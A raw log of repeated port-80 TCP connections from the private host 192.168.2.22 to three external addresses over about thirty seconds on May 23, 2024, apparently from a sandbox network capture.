May 23, 2024 20:17:57.723283052 CEST	49183	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:57.775429010 CEST	80	49183	188.114.97.3	192.168.2.22
May 23, 2024 20:17:57.912589073 CEST	49184	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:57.918374062 CEST	80	49184	188.114.96.3	192.168.2.22
May 23, 2024 20:17:57.918417931 CEST	49184	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:57.920774937 CEST	49184	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:57.972227097 CEST	80	49184	188.114.96.3	192.168.2.22
May 23, 2024 20:17:57.972280979 CEST	49184	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:57.977178097 CEST	80	49184	188.114.96.3	192.168.2.22
May 23, 2024 20:17:58.649785995 CEST	80	49184	188.114.96.3	192.168.2.22
May 23, 2024 20:17:58.649863005 CEST	49184	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:58.654664040 CEST	80	49184	188.114.96.3	192.168.2.22
May 23, 2024 20:17:58.654707909 CEST	49184	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:58.703315020 CEST	80	49184	188.114.96.3	192.168.2.22
May 23, 2024 20:17:58.813716888 CEST	49185	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:58.818624973 CEST	80	49185	188.114.96.3	192.168.2.22
May 23, 2024 20:17:58.818666935 CEST	49185	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:58.820260048 CEST	49185	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:58.871521950 CEST	80	49185	188.114.96.3	192.168.2.22
May 23, 2024 20:17:58.871562958 CEST	49185	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:58.877433062 CEST	80	49185	188.114.96.3	192.168.2.22
May 23, 2024 20:17:59.573703051 CEST	80	49185	188.114.96.3	192.168.2.22
May 23, 2024 20:17:59.575855017 CEST	49185	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:59.578419924 CEST	80	49185	188.114.96.3	192.168.2.22
May 23, 2024 20:17:59.578474045 CEST	49185	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:59.623502970 CEST	80	49185	188.114.96.3	192.168.2.22
May 23, 2024 20:17:59.754992008 CEST	49186	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:59.763341904 CEST	80	49186	188.114.97.3	192.168.2.22
May 23, 2024 20:17:59.763427019 CEST	49186	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:59.837093115 CEST	49186	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:59.842132092 CEST	80	49186	188.114.97.3	192.168.2.22
May 23, 2024 20:17:59.842195034 CEST	49186	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:59.851670027 CEST	80	49186	188.114.97.3	192.168.2.22
May 23, 2024 20:18:00.570625067 CEST	80	49186	188.114.97.3	192.168.2.22
May 23, 2024 20:18:00.572072983 CEST	49186	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:00.579354048 CEST	80	49186	188.114.97.3	192.168.2.22
May 23, 2024 20:18:00.579368114 CEST	80	49186	188.114.97.3	192.168.2.22
May 23, 2024 20:18:00.579411983 CEST	49186	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:00.627460003 CEST	80	49186	188.114.97.3	192.168.2.22
May 23, 2024 20:18:00.730343103 CEST	49187	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:00.735315084 CEST	80	49187	188.114.96.3	192.168.2.22
May 23, 2024 20:18:00.735474110 CEST	49187	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:00.736741066 CEST	49187	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:00.788328886 CEST	80	49187	188.114.96.3	192.168.2.22
May 23, 2024 20:18:00.788536072 CEST	49187	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:00.793399096 CEST	80	49187	188.114.96.3	192.168.2.22
May 23, 2024 20:18:01.358052015 CEST	80	49187	188.114.96.3	192.168.2.22
May 23, 2024 20:18:01.358267069 CEST	49187	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:01.363481045 CEST	80	49187	188.114.96.3	192.168.2.22
May 23, 2024 20:18:01.363544941 CEST	49187	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:01.411407948 CEST	80	49187	188.114.96.3	192.168.2.22
May 23, 2024 20:18:01.547558069 CEST	49188	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:01.556430101 CEST	80	49188	188.114.96.3	192.168.2.22
May 23, 2024 20:18:01.556608915 CEST	49188	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:01.557933092 CEST	49188	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:01.607655048 CEST	80	49188	188.114.96.3	192.168.2.22
May 23, 2024 20:18:01.607893944 CEST	49188	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:01.613234997 CEST	80	49188	188.114.96.3	192.168.2.22
May 23, 2024 20:18:02.216253996 CEST	80	49188	188.114.96.3	192.168.2.22
May 23, 2024 20:18:02.216367006 CEST	49188	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:02.221092939 CEST	80	49188	188.114.96.3	192.168.2.22
May 23, 2024 20:18:02.221208096 CEST	49188	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:02.267656088 CEST	80	49188	188.114.96.3	192.168.2.22
May 23, 2024 20:18:02.362355947 CEST	49189	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:02.367338896 CEST	80	49189	188.114.96.3	192.168.2.22
May 23, 2024 20:18:02.367429972 CEST	49189	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:02.368807077 CEST	49189	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:02.423688889 CEST	80	49189	188.114.96.3	192.168.2.22
May 23, 2024 20:18:02.423894882 CEST	49189	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:02.429110050 CEST	80	49189	188.114.96.3	192.168.2.22
May 23, 2024 20:18:03.109268904 CEST	80	49189	188.114.96.3	192.168.2.22
May 23, 2024 20:18:03.109477043 CEST	49189	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:03.113977909 CEST	80	49189	188.114.96.3	192.168.2.22
May 23, 2024 20:18:03.114226103 CEST	49189	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:03.159398079 CEST	80	49189	188.114.96.3	192.168.2.22
May 23, 2024 20:18:03.271646976 CEST	49190	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:03.277050972 CEST	80	49190	188.114.96.3	192.168.2.22
May 23, 2024 20:18:03.277173996 CEST	49190	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:03.278749943 CEST	49190	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:03.339145899 CEST	80	49190	188.114.96.3	192.168.2.22
May 23, 2024 20:18:03.339329004 CEST	49190	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:03.347313881 CEST	80	49190	188.114.96.3	192.168.2.22
May 23, 2024 20:18:04.014142990 CEST	80	49190	188.114.96.3	192.168.2.22
May 23, 2024 20:18:04.014384031 CEST	49190	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:04.018774986 CEST	80	49190	188.114.96.3	192.168.2.22
May 23, 2024 20:18:04.018855095 CEST	49190	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:04.067421913 CEST	80	49190	188.114.96.3	192.168.2.22
May 23, 2024 20:18:04.163593054 CEST	49191	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:04.174627066 CEST	80	49191	188.114.96.3	192.168.2.22
May 23, 2024 20:18:04.174877882 CEST	49191	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:04.176230907 CEST	49191	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:04.231723070 CEST	80	49191	188.114.96.3	192.168.2.22
May 23, 2024 20:18:04.232033014 CEST	49191	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:04.237247944 CEST	80	49191	188.114.96.3	192.168.2.22
May 23, 2024 20:18:05.011420012 CEST	80	49191	188.114.96.3	192.168.2.22
May 23, 2024 20:18:05.011512995 CEST	49191	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:05.016175032 CEST	80	49191	188.114.96.3	192.168.2.22
May 23, 2024 20:18:05.016252041 CEST	49191	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:05.063561916 CEST	80	49191	188.114.96.3	192.168.2.22
May 23, 2024 20:18:06.036950111 CEST	49192	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:06.044177055 CEST	80	49192	188.114.97.3	192.168.2.22
May 23, 2024 20:18:06.044223070 CEST	49192	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:06.045591116 CEST	49192	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:06.103562117 CEST	80	49192	188.114.97.3	192.168.2.22
May 23, 2024 20:18:06.103692055 CEST	49192	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:06.108910084 CEST	80	49192	188.114.97.3	192.168.2.22
May 23, 2024 20:18:06.911864042 CEST	80	49192	188.114.97.3	192.168.2.22
May 23, 2024 20:18:06.913633108 CEST	49192	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:06.916771889 CEST	80	49192	188.114.97.3	192.168.2.22
May 23, 2024 20:18:06.916832924 CEST	49192	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:06.967356920 CEST	80	49192	188.114.97.3	192.168.2.22
May 23, 2024 20:18:07.077646017 CEST	49193	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:07.082768917 CEST	80	49193	188.114.97.3	192.168.2.22
May 23, 2024 20:18:07.082839012 CEST	49193	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:07.107765913 CEST	49193	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:07.135510921 CEST	80	49193	188.114.97.3	192.168.2.22
May 23, 2024 20:18:07.135699987 CEST	49193	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:07.143167019 CEST	80	49193	188.114.97.3	192.168.2.22
May 23, 2024 20:18:07.833966970 CEST	80	49193	188.114.97.3	192.168.2.22
May 23, 2024 20:18:07.834264994 CEST	49193	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:07.838851929 CEST	80	49193	188.114.97.3	192.168.2.22
May 23, 2024 20:18:07.838963985 CEST	49193	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:07.887854099 CEST	80	49193	188.114.97.3	192.168.2.22
May 23, 2024 20:18:07.983136892 CEST	49194	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:07.988240004 CEST	80	49194	188.114.96.3	192.168.2.22
May 23, 2024 20:18:07.988315105 CEST	49194	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:07.989686012 CEST	49194	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:08.039583921 CEST	80	49194	188.114.96.3	192.168.2.22
May 23, 2024 20:18:08.039657116 CEST	49194	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:08.044790030 CEST	80	49194	188.114.96.3	192.168.2.22
May 23, 2024 20:18:08.765249968 CEST	80	49194	188.114.96.3	192.168.2.22
May 23, 2024 20:18:08.765441895 CEST	49194	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:08.769992113 CEST	80	49194	188.114.96.3	192.168.2.22
May 23, 2024 20:18:08.770059109 CEST	49194	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:08.815469980 CEST	80	49194	188.114.96.3	192.168.2.22
May 23, 2024 20:18:08.941648960 CEST	49195	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:08.946636915 CEST	80	49195	188.114.96.3	192.168.2.22
May 23, 2024 20:18:08.946713924 CEST	49195	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:08.948107004 CEST	49195	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:09.004625082 CEST	80	49195	188.114.96.3	192.168.2.22
May 23, 2024 20:18:09.004693985 CEST	49195	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:09.009738922 CEST	80	49195	188.114.96.3	192.168.2.22
May 23, 2024 20:18:09.690977097 CEST	80	49195	188.114.96.3	192.168.2.22
May 23, 2024 20:18:09.691113949 CEST	49195	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:09.695756912 CEST	80	49195	188.114.96.3	192.168.2.22
May 23, 2024 20:18:09.695915937 CEST	49195	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:09.747828007 CEST	80	49195	188.114.96.3	192.168.2.22
May 23, 2024 20:18:09.852881908 CEST	49196	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:09.859344959 CEST	80	49196	188.114.97.3	192.168.2.22
May 23, 2024 20:18:09.859416008 CEST	49196	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:09.860809088 CEST	49196	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:09.911744118 CEST	80	49196	188.114.97.3	192.168.2.22
May 23, 2024 20:18:09.911942959 CEST	49196	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:09.916882992 CEST	80	49196	188.114.97.3	192.168.2.22
May 23, 2024 20:18:10.520375967 CEST	80	49196	188.114.97.3	192.168.2.22
May 23, 2024 20:18:10.520497084 CEST	49196	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:10.525280952 CEST	80	49196	188.114.97.3	192.168.2.22
May 23, 2024 20:18:10.525347948 CEST	49196	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:10.574280024 CEST	80	49196	188.114.97.3	192.168.2.22
May 23, 2024 20:18:10.672262907 CEST	49197	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:10.677340984 CEST	80	49197	188.114.96.3	192.168.2.22
May 23, 2024 20:18:10.677427053 CEST	49197	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:10.679780960 CEST	49197	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:10.731678009 CEST	80	49197	188.114.96.3	192.168.2.22
May 23, 2024 20:18:10.732007027 CEST	49197	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:10.737154007 CEST	80	49197	188.114.96.3	192.168.2.22
May 23, 2024 20:18:11.463794947 CEST	80	49197	188.114.96.3	192.168.2.22
May 23, 2024 20:18:11.468555927 CEST	80	49197	188.114.96.3	192.168.2.22
May 23, 2024 20:18:11.468710899 CEST	49197	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:11.562999010 CEST	49197	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:11.568592072 CEST	80	49197	188.114.96.3	192.168.2.22
May 23, 2024 20:18:11.707807064 CEST	49198	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:11.712827921 CEST	80	49198	188.114.96.3	192.168.2.22
May 23, 2024 20:18:11.712877989 CEST	49198	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:11.714251041 CEST	49198	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:11.765427113 CEST	80	49198	188.114.96.3	192.168.2.22
May 23, 2024 20:18:11.765513897 CEST	49198	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:11.773397923 CEST	80	49198	188.114.96.3	192.168.2.22
May 23, 2024 20:18:12.461520910 CEST	80	49198	188.114.96.3	192.168.2.22
May 23, 2024 20:18:12.462222099 CEST	49198	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:12.466284037 CEST	80	49198	188.114.96.3	192.168.2.22
May 23, 2024 20:18:12.466363907 CEST	49198	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:12.511349916 CEST	80	49198	188.114.96.3	192.168.2.22
May 23, 2024 20:18:16.264302015 CEST	49199	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:16.269280910 CEST	80	49199	188.114.96.3	192.168.2.22
May 23, 2024 20:18:16.269365072 CEST	49199	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:16.270962000 CEST	49199	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:16.327801943 CEST	80	49199	188.114.96.3	192.168.2.22
May 23, 2024 20:18:16.327889919 CEST	49199	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:16.332849026 CEST	80	49199	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.009301901 CEST	80	49199	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.009463072 CEST	49199	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.013881922 CEST	80	49199	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.013959885 CEST	49199	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.059484005 CEST	80	49199	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.149787903 CEST	49200	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.154689074 CEST	80	49200	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.154762030 CEST	49200	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.156368017 CEST	49200	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.221580029 CEST	80	49200	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.221688032 CEST	49200	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.231185913 CEST	80	49200	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.923675060 CEST	80	49200	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.923909903 CEST	49200	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.928392887 CEST	80	49200	188.114.96.3	192.168.2.22
May 23, 2024 20:18:17.928472996 CEST	49200	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:17.979387045 CEST	80	49200	188.114.96.3	192.168.2.22
May 23, 2024 20:18:18.070599079 CEST	49201	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:18.078079939 CEST	80	49201	188.114.97.3	192.168.2.22
May 23, 2024 20:18:18.078155041 CEST	49201	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:18.079750061 CEST	49201	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:18.131536961 CEST	80	49201	188.114.97.3	192.168.2.22
May 23, 2024 20:18:18.131640911 CEST	49201	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:18.136893034 CEST	80	49201	188.114.97.3	192.168.2.22
May 23, 2024 20:18:18.808876038 CEST	80	49201	188.114.97.3	192.168.2.22
May 23, 2024 20:18:18.809071064 CEST	49201	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:18.813684940 CEST	80	49201	188.114.97.3	192.168.2.22
May 23, 2024 20:18:18.813749075 CEST	49201	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:18.859734058 CEST	80	49201	188.114.97.3	192.168.2.22
May 23, 2024 20:18:18.964879990 CEST	49202	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:18.974132061 CEST	80	49202	188.114.96.9	192.168.2.22
May 23, 2024 20:18:18.974194050 CEST	49202	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:18.976087093 CEST	49202	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:19.027650118 CEST	80	49202	188.114.96.9	192.168.2.22
May 23, 2024 20:18:19.027724028 CEST	49202	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:19.032886028 CEST	80	49202	188.114.96.9	192.168.2.22
May 23, 2024 20:18:19.808820963 CEST	80	49202	188.114.96.9	192.168.2.22
May 23, 2024 20:18:19.808960915 CEST	49202	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:19.813631058 CEST	80	49202	188.114.96.9	192.168.2.22
May 23, 2024 20:18:19.813702106 CEST	49202	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:19.862462997 CEST	80	49202	188.114.96.9	192.168.2.22
May 23, 2024 20:18:19.980058908 CEST	49203	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:19.986592054 CEST	80	49203	188.114.96.3	192.168.2.22
May 23, 2024 20:18:19.986677885 CEST	49203	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:19.988815069 CEST	49203	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:20.039613008 CEST	80	49203	188.114.96.3	192.168.2.22
May 23, 2024 20:18:20.039690018 CEST	49203	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:20.046281099 CEST	80	49203	188.114.96.3	192.168.2.22
May 23, 2024 20:18:20.721458912 CEST	80	49203	188.114.96.3	192.168.2.22
May 23, 2024 20:18:20.721590042 CEST	49203	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:20.741492033 CEST	80	49203	188.114.96.3	192.168.2.22
May 23, 2024 20:18:20.741566896 CEST	49203	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:20.783457041 CEST	80	49203	188.114.96.3	192.168.2.22
May 23, 2024 20:18:20.875890017 CEST	49204	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:20.880871058 CEST	80	49204	188.114.96.9	192.168.2.22
May 23, 2024 20:18:20.880923986 CEST	49204	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:20.882874012 CEST	49204	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:20.935703039 CEST	80	49204	188.114.96.9	192.168.2.22
May 23, 2024 20:18:20.935875893 CEST	49204	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:20.940905094 CEST	80	49204	188.114.96.9	192.168.2.22
May 23, 2024 20:18:21.692867041 CEST	80	49204	188.114.96.9	192.168.2.22
May 23, 2024 20:18:21.693047047 CEST	49204	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:21.699018955 CEST	80	49204	188.114.96.9	192.168.2.22
May 23, 2024 20:18:21.699079990 CEST	49204	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:21.751240969 CEST	80	49204	188.114.96.9	192.168.2.22
May 23, 2024 20:18:21.829606056 CEST	49205	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:21.834616899 CEST	80	49205	188.114.96.3	192.168.2.22
May 23, 2024 20:18:21.834672928 CEST	49205	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:21.836224079 CEST	49205	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:21.888178110 CEST	80	49205	188.114.96.3	192.168.2.22
May 23, 2024 20:18:21.888267994 CEST	49205	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:21.893537998 CEST	80	49205	188.114.96.3	192.168.2.22
May 23, 2024 20:18:22.626806021 CEST	80	49205	188.114.96.3	192.168.2.22
May 23, 2024 20:18:22.627039909 CEST	49205	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:22.631593943 CEST	80	49205	188.114.96.3	192.168.2.22
May 23, 2024 20:18:22.631706953 CEST	49205	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:22.684015036 CEST	80	49205	188.114.96.3	192.168.2.22
May 23, 2024 20:18:22.765367985 CEST	49206	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:22.770344019 CEST	80	49206	188.114.96.3	192.168.2.22
May 23, 2024 20:18:22.770414114 CEST	49206	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:22.772747993 CEST	49206	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:22.823534966 CEST	80	49206	188.114.96.3	192.168.2.22
May 23, 2024 20:18:22.823609114 CEST	49206	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:22.828682899 CEST	80	49206	188.114.96.3	192.168.2.22
May 23, 2024 20:18:23.512218952 CEST	80	49206	188.114.96.3	192.168.2.22
May 23, 2024 20:18:23.512377977 CEST	49206	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:23.518044949 CEST	80	49206	188.114.96.3	192.168.2.22
May 23, 2024 20:18:23.518137932 CEST	49206	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:23.564105034 CEST	80	49206	188.114.96.3	192.168.2.22
May 23, 2024 20:18:23.666809082 CEST	49207	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:23.672270060 CEST	80	49207	188.114.96.3	192.168.2.22
May 23, 2024 20:18:23.672561884 CEST	49207	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:23.674890041 CEST	49207	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:23.724412918 CEST	80	49207	188.114.96.3	192.168.2.22
May 23, 2024 20:18:23.724689007 CEST	49207	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:23.730101109 CEST	80	49207	188.114.96.3	192.168.2.22
May 23, 2024 20:18:24.406585932 CEST	80	49207	188.114.96.3	192.168.2.22
May 23, 2024 20:18:24.406709909 CEST	49207	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:24.411914110 CEST	80	49207	188.114.96.3	192.168.2.22
May 23, 2024 20:18:24.411984921 CEST	49207	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:24.466341019 CEST	80	49207	188.114.96.3	192.168.2.22
May 23, 2024 20:18:24.558347940 CEST	49208	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:24.563484907 CEST	80	49208	188.114.96.3	192.168.2.22
May 23, 2024 20:18:24.563580990 CEST	49208	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:24.566045046 CEST	49208	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:24.619518042 CEST	80	49208	188.114.96.3	192.168.2.22
May 23, 2024 20:18:24.619584084 CEST	49208	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:24.624912024 CEST	80	49208	188.114.96.3	192.168.2.22
May 23, 2024 20:18:25.323944092 CEST	80	49208	188.114.96.3	192.168.2.22
May 23, 2024 20:18:25.324134111 CEST	49208	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:25.328653097 CEST	80	49208	188.114.96.3	192.168.2.22
May 23, 2024 20:18:25.328747988 CEST	49208	80	192.168.2.22	188.114.96.3
May 23, 2024 20:18:25.378937006 CEST	80	49208	188.114.96.3	192.168.2.22
May 23, 2024 20:18:25.477304935 CEST	49209	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:25.483161926 CEST	80	49209	188.114.97.3	192.168.2.22
May 23, 2024 20:18:25.483273983 CEST	49209	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:25.484709978 CEST	49209	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:25.540159941 CEST	80	49209	188.114.97.3	192.168.2.22
May 23, 2024 20:18:25.540275097 CEST	49209	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:25.550825119 CEST	80	49209	188.114.97.3	192.168.2.22
May 23, 2024 20:18:26.225308895 CEST	80	49209	188.114.97.3	192.168.2.22
May 23, 2024 20:18:26.225451946 CEST	49209	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:26.238154888 CEST	80	49209	188.114.97.3	192.168.2.22
May 23, 2024 20:18:26.238394976 CEST	49209	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:26.283432961 CEST	80	49209	188.114.97.3	192.168.2.22
May 23, 2024 20:18:26.588325977 CEST	49210	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:26.593250990 CEST	80	49210	188.114.96.9	192.168.2.22
May 23, 2024 20:18:26.593313932 CEST	49210	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:26.597771883 CEST	49210	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:26.644861937 CEST	80	49210	188.114.96.9	192.168.2.22
May 23, 2024 20:18:26.644923925 CEST	49210	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:26.650892019 CEST	80	49210	188.114.96.9	192.168.2.22
May 23, 2024 20:18:27.352135897 CEST	80	49210	188.114.96.9	192.168.2.22
May 23, 2024 20:18:27.352344990 CEST	49210	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:27.359999895 CEST	80	49210	188.114.96.9	192.168.2.22
May 23, 2024 20:18:27.360059023 CEST	49210	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:27.505734921 CEST	49211	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:27.511409998 CEST	80	49211	188.114.97.3	192.168.2.22
May 23, 2024 20:18:27.511713982 CEST	49211	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:27.512891054 CEST	49211	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:27.564291000 CEST	80	49211	188.114.97.3	192.168.2.22
May 23, 2024 20:18:27.564429045 CEST	49211	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:27.571541071 CEST	80	49211	188.114.97.3	192.168.2.22
May 23, 2024 20:18:28.221432924 CEST	80	49211	188.114.97.3	192.168.2.22
May 23, 2024 20:18:28.221582890 CEST	49211	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:28.226118088 CEST	80	49211	188.114.97.3	192.168.2.22
May 23, 2024 20:18:28.226295948 CEST	49211	80	192.168.2.22	188.114.97.3
May 23, 2024 20:18:28.271677017 CEST	80	49211	188.114.97.3	192.168.2.22
May 23, 2024 20:18:28.368727922 CEST	49212	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:28.374696970 CEST	80	49212	188.114.96.9	192.168.2.22
May 23, 2024 20:18:28.374763012 CEST	49212	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:28.376454115 CEST	49212	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:28.429728031 CEST	80	49212	188.114.96.9	192.168.2.22
May 23, 2024 20:18:28.429852962 CEST	49212	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:28.436306000 CEST	80	49212	188.114.96.9	192.168.2.22
May 23, 2024 20:18:29.124516010 CEST	80	49212	188.114.96.9	192.168.2.22
May 23, 2024 20:18:29.124638081 CEST	49212	80	192.168.2.22	188.114.96.9
May 23, 2024 20:18:29.129431963 CEST	80	49212	188.114.96.9	192.168.2.22
